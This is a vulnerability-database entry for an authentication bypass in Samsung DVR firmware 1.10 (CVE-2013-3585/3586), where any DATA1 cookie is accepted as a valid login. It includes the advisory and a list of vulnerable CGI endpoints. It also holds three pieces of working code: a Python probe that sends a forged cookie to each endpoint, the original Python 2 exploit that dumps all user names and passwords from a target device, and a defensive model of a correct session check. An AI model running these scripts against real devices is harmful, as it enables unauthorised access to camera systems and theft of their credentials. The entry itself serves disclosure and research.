ID

VAR-E-201308-0457


CVE

cve_id:CVE-2013-3585

Trust: 1.6

cve_id:CVE-2013-3586

Trust: 1.0

sources: EXPLOIT-DB: 27753 // EDBNET: 49607

EDB ID

27753


TITLE

Samsung DVR Firmware 1.10 - Authentication Bypass - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 27753

DESCRIPTION

Samsung DVR Firmware 1.10 - Authentication Bypass. IDs: CVE-2013-3586, CVE-2013-3585, CVE-96510, CVE-96509. webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 27753

AFFECTED PRODUCTS

vendor: samsung, model: dvr, scope: eq, version: 1.10

Trust: 1.6

sources: EXPLOIT-DB: 27753 // EDBNET: 49607

EXPLOIT

**************************************************************
Title: Samsung DVR authentication bypass
Version affected: firmware version <= 1.10
Vendor: Samsung - www.samsung-security.com
Discovered by: Andrea Fabrizi
Email: andrea.fabrizi@gmail.com
Web: http://www.andreafabrizi.it
Twitter: @andreaf83
Status: unpatched
**************************************************************

Samsung provides a wide range of DVR products that all run nearly the
same firmware. The firmware is an embedded Linux system that exposes a
web interface through the lighttpd web server and CGI pages.

The authenticated session is tracked with two cookies, DATA1 and DATA2,
which hold the base64-encoded username and password respectively. Base64
is an encoding, not encryption, so anyone who can observe the HTTP
traffic or read the browser's cookie store recovers the credentials
directly. The first piece of advice for the developers is therefore:
do not put user credentials into cookies!

The critical vulnerability, however, is that most of the CGIs perform the
session check incorrectly: the mere presence of a cookie is accepted as
proof of authentication and its contents are never validated. Protected
pages can therefore be reached simply by putting an arbitrary cookie into
the HTTP request (the PoC below sends only DATA1, set to the base64
encoding of a junk string). Yes, that's all.
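The two design flaws above, as an added illustrative model rather than the firmware's own code (the real CGI source is not on the page): decoding the credential cookies shows what a passive observer recovers, the vulnerable check reproduces the observable behaviour that any DATA1 cookie is accepted, and the SessionStore class is the corrected design (credentials verified once at login, browser holds only a random server-side token). The sample cookie values, the SESSION cookie name and the SessionStore API are assumptions chosen for the example.

```python
"""Illustrative model of the DVR's cookie-based session handling.

Added example, not the firmware's own code: the "vulnerable" function only
reproduces the behaviour described in the advisory (presence of any DATA1
cookie is enough), and SessionStore shows the design that should be used.
"""
import base64
import binascii
import hashlib
import hmac
import secrets


def parse_cookies(cookie_header):
    """Minimal Cookie-header parser: 'a=1; b=2' -> {'a': '1', 'b': '2'}."""
    cookies = {}
    for part in cookie_header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name.strip()] = value.strip()
    return cookies


def decode_credential_cookies(cookie_header):
    """Recover the username/password the DVR stores in DATA1/DATA2.

    Anyone who sees the request (proxy logs, a packet capture on the LAN)
    can do this, which is why credentials never belong in a cookie.
    """
    cookies = parse_cookies(cookie_header)
    found = {}
    for cookie_name, field in (("DATA1", "username"), ("DATA2", "password")):
        if cookie_name in cookies:
            try:
                raw = base64.b64decode(cookies[cookie_name], validate=True)
                found[field] = raw.decode("utf-8", "replace")
            except (binascii.Error, ValueError):
                found[field] = None  # not valid base64
    return found


def vulnerable_session_check(cookie_header):
    """Model of the broken check: DATA1 present == authenticated.

    Nothing is decoded or compared, so the PoC's DATA1=YWFhYWFhYWFhYQ==
    (base64 of 'aaaaaaaaaa') passes exactly like a real login would.
    """
    return "DATA1" in parse_cookies(cookie_header)


def _hash_password(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 100_000)


class SessionStore:
    """Corrected design: credentials are verified once at login and the
    browser only ever holds a random, server-side session token."""

    def __init__(self):
        self._credentials = {}  # username -> (salt, pbkdf2 hash)
        self._sessions = {}     # token -> username

    def add_user(self, username, password):
        salt = secrets.token_bytes(16)
        self._credentials[username] = (salt, _hash_password(password, salt))

    def login(self, username, password):
        """Return a session token, or None on bad credentials."""
        if username not in self._credentials:
            return None
        salt, expected = self._credentials[username]
        if not hmac.compare_digest(_hash_password(password, salt), expected):
            return None
        token = secrets.token_urlsafe(32)
        self._sessions[token] = username
        return token

    def hardened_session_check(self, cookie_header):
        """Authenticated only if the SESSION cookie is a token we issued."""
        token = parse_cookies(cookie_header).get("SESSION")
        return token is not None and token in self._sessions


if __name__ == "__main__":
    bogus = "DATA1=YWFhYWFhYWFhYQ=="          # the PoC's cookie
    real = "DATA1=YWRtaW4=; DATA2=NDMyMQ=="  # constructed: admin / 4321
    print("credentials leaked by a real cookie:", decode_credential_cookies(real))
    print("vulnerable check, bogus cookie:", vulnerable_session_check(bogus))
    store = SessionStore()
    store.add_user("admin", "4321")
    print("hardened check, bogus cookie:", store.hardened_session_check(bogus))
    token = store.login("admin", "4321")
    print("hardened check, real session:", store.hardened_session_check("SESSION=" + token))
```

The hardened check never inspects a username or password on the wire: the cookie is an opaque token that only means something because the server remembers issuing it, so a forged cookie fails regardless of its contents.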

This vulnerability allows remote unauthenticated users to:
- Get/set/delete username/password of local users (/cgi-bin/setup_user)
- Get/set DVR/Camera general configuration
- Get info about the device/storage
- Get/set the NTP server
- Get/set many other settings

Vulnerable CGIs:
- /cgi-bin/camera_privacy_area
- /cgi-bin/dev_camera
- /cgi-bin/dev_devinfo
- /cgi-bin/dev_devinfo2
- /cgi-bin/dev_hddalarm
- /cgi-bin/dev_modechange
- /cgi-bin/dev_monitor
- /cgi-bin/dev_pos
- /cgi-bin/dev_ptz
- /cgi-bin/dev_remote
- /cgi-bin/dev_spotout
- /cgi-bin/event_alarmsched
- /cgi-bin/event_motion_area
- /cgi-bin/event_motiondetect
- /cgi-bin/event_sensordetect
- /cgi-bin/event_tamper
- /cgi-bin/event_vldetect
- /cgi-bin/net_callback
- /cgi-bin/net_connmode
- /cgi-bin/net_ddns
- /cgi-bin/net_event
- /cgi-bin/net_group
- /cgi-bin/net_imagetrans
- /cgi-bin/net_recipient
- /cgi-bin/net_server
- /cgi-bin/net_snmp
- /cgi-bin/net_transprotocol
- /cgi-bin/net_user
- /cgi-bin/rec_event
- /cgi-bin/rec_eventrecduration
- /cgi-bin/rec_normal
- /cgi-bin/rec_recopt
- /cgi-bin/rec_recsched
- /cgi-bin/restart_page
- /cgi-bin/setup_admin_setup
- /cgi-bin/setup_datetimelang
- /cgi-bin/setup_group
- /cgi-bin/setup_holiday
- /cgi-bin/setup_ntp
- /cgi-bin/setup_systeminfo
- /cgi-bin/setup_user
- /cgi-bin/setup_userpwd
- /cgi-bin/webviewer
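A Python 3 probe over the CGI list above, added here as example code that is not the original PoC. It sends each CGI one request without cookies and one with a junk DATA1 cookie, and flags a CGI as bypassed when the junk cookie turns a different response into an HTTP 200 page. That decision rule is an assumption, not something the advisory states, so it is kept in a separate function that can be run offline on constructed responses; the default CGI subset, the constructed setup_user HTML sample and the host used in the usage note are likewise assumptions.

```python
"""Probe the advisory's CGIs with a bogus DATA1 cookie (added example).

Network I/O is confined to fetch()/scan(); classify() and extract_users()
are pure functions so the logic can be exercised on constructed data.
"""
import base64
import re
import urllib.error
import urllib.request
from html.parser import HTMLParser

# Assumption: a representative subset; pass the advisory's full list to scan().
DEFAULT_CGIS = (
    "/cgi-bin/setup_user",
    "/cgi-bin/setup_ntp",
    "/cgi-bin/dev_devinfo",
    "/cgi-bin/net_server",
)

# Constructed sample of what setup_user returns, shaped like the hidden
# inputs the original PoC's regexes match; not captured from a real device.
SAMPLE_SETUP_USER_HTML = (
    "<html><body><form>"
    "<input type=hidden name='admin_id' value='admin'>"
    "<input type='hidden' name='nameUser_Name_0' value='admin'>"
    "<input type='hidden' name='nameUser_Pw_0' value='4321'>"
    "<input type='hidden' name='nameUser_Name_1' value='operator'>"
    "<input type='hidden' name='nameUser_Pw_1' value='cam123'>"
    "</form></body></html>"
)


def bypass_cookie(junk=b"aaaaaaaaaa"):
    """Any value works; the default reproduces the PoC's DATA1=YWFhYWFhYWFhYQ==."""
    return "DATA1=" + base64.b64encode(junk).decode("ascii")


def fetch(url, cookie=None, timeout=5.0):
    """GET url and return (status, body); HTTP error statuses are returned, not raised."""
    req = urllib.request.Request(url)
    if cookie:
        req.add_header("Cookie", cookie)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.getcode(), resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def classify(no_cookie, bogus):
    """Heuristic (assumption): if presenting junk in DATA1 changes the answer
    into a 200 page, the CGI treated the junk cookie as a valid session."""
    bogus_status, bogus_body = bogus
    if bogus_status != 200:
        return "denied"
    if bogus_body == no_cookie[1]:
        return "cookie-independent"  # open to everyone, or denied either way
    return "bypass"


class _HiddenInputs(HTMLParser):
    """Collect name -> value for every <input type=hidden>."""

    def __init__(self):
        super().__init__()
        self.fields = {}

    def handle_starttag(self, tag, attrs):
        attr = dict(attrs)
        if tag == "input" and attr.get("type") == "hidden" and attr.get("name"):
            self.fields[attr["name"]] = attr.get("value") or ""


def extract_users(html):
    """Pair nameUser_Name_N with nameUser_Pw_N, as the PoC does with regexes."""
    parser = _HiddenInputs()
    parser.feed(html)
    users = []
    for name, value in parser.fields.items():
        match = re.fullmatch(r"nameUser_Name_(\d+)", name)
        if match:
            users.append((value, parser.fields.get("nameUser_Pw_" + match.group(1), "")))
    return users


def scan(host, cgis=DEFAULT_CGIS):
    """Return {cgi: verdict} for the given DVR host (network access required)."""
    results = {}
    for cgi in cgis:
        url = "http://%s%s" % (host, cgi)
        results[cgi] = classify(fetch(url), fetch(url, bypass_cookie()))
    return results


if __name__ == "__main__":
    print("bogus cookie:", bypass_cookie())
    print("users in constructed sample:", extract_users(SAMPLE_SETUP_USER_HTML))
```

Run `scan("192.0.2.10")` (address assumed) only against a device you are authorised to test; the probe issues GET requests with no parameters, so it reads configuration but does not change it, unlike the set variants of these CGIs.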

PoC exploit to list device users and passwords:
http://www.andreafabrizi.it/download.php?file=samsung_dvr.py
#!/usr/bin/env python
#
#**************************************************************
#Title: Samsung DVR authentication bypass
#Version affected: firmware version <= 1.10
#Vendor: Samsung - www.samsung-security.com
#Discovered by: Andrea Fabrizi
#Email: andrea.fabrizi@gmail.com
#Web: http://www.andreafabrizi.it
#Twitter: @andreaf83
#Status: unpatched
#**************************************************************
# Python 2 script; indentation restored as published.

import urllib2
import re
import sys

if __name__ == "__main__":

    if len(sys.argv) != 2:
        print "usage: %s [TARGET]" % sys.argv[0]
        sys.exit(1)

    ip = sys.argv[1]
    # Any DATA1 value is accepted by the CGIs; this one is base64("aaaaaaaaaa")
    headers = {"Cookie" : "DATA1=YWFhYWFhYWFhYQ==" }

    print "SAMSUNG DVR Authentication Bypass"
    print "Vulnerability and exploit by Andrea Fabrizi <andrea.fabrizi@gmail.com>\n"
    print "Target => %s\n" % ip

    #Dumping users: setup_user returns every account and password as hidden form fields
    print "##### DUMPING USERS ####"
    req = urllib2.Request("http://%s/cgi-bin/setup_user" % ip, None, headers)
    response = urllib2.urlopen(req)
    user_found = False

    for line in response.readlines():

        exp = re.search(".*<input type=\'hidden\' name=\'nameUser_Name_[0-9]*\' value=\'(.*)\'.*", line)
        if exp:
            print exp.group(1),

        exp = re.search(".*<input type=\'hidden\' name=\'nameUser_Pw_[0-9]*\' value=\'(.*)\'.*", line)
        if exp:
            print ": " + exp.group(1)
            user_found = True

        exp = re.search(".*<input type=hidden name=\'admin_id\' value=\'(.*)\'.*", line)
        if exp:
            print "Admin ID => %s" % exp.group(1)


    if not user_found:
        print "No user found."

Trust: 1.0

sources: EXPLOIT-DB: 27753

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 27753

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 27753

TYPE

Authentication Bypass

Trust: 1.6

sources: EXPLOIT-DB: 27753 // EDBNET: 49607

CREDITS

Andrea Fabrizi

Trust: 0.6

sources: EXPLOIT-DB: 27753

EXTERNAL IDS

db: NVD, id: CVE-2013-3585

Trust: 1.6

db: EXPLOIT-DB, id: 27753

Trust: 1.6

db: NVD, id: CVE-2013-3586

Trust: 1.0

db: EDBNET, id: 49607

Trust: 0.6

sources: EXPLOIT-DB: 27753 // EDBNET: 49607

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2013-3585

Trust: 1.6

url:https://nvd.nist.gov/vuln/detail/cve-2013-3586

Trust: 1.0

url:https://www.exploit-db.com/exploits/27753/

Trust: 0.6

sources: EXPLOIT-DB: 27753 // EDBNET: 49607

SOURCES

db: EXPLOIT-DB, id: 27753
db: EDBNET, id: 49607

LAST UPDATE DATE

2022-07-27T09:47:31.112000+00:00


SOURCES RELEASE DATE

db: EXPLOIT-DB, id: 27753, date: 2013-08-21T00:00:00
db: EDBNET, id: 49607, date: 2013-08-21T00:00:00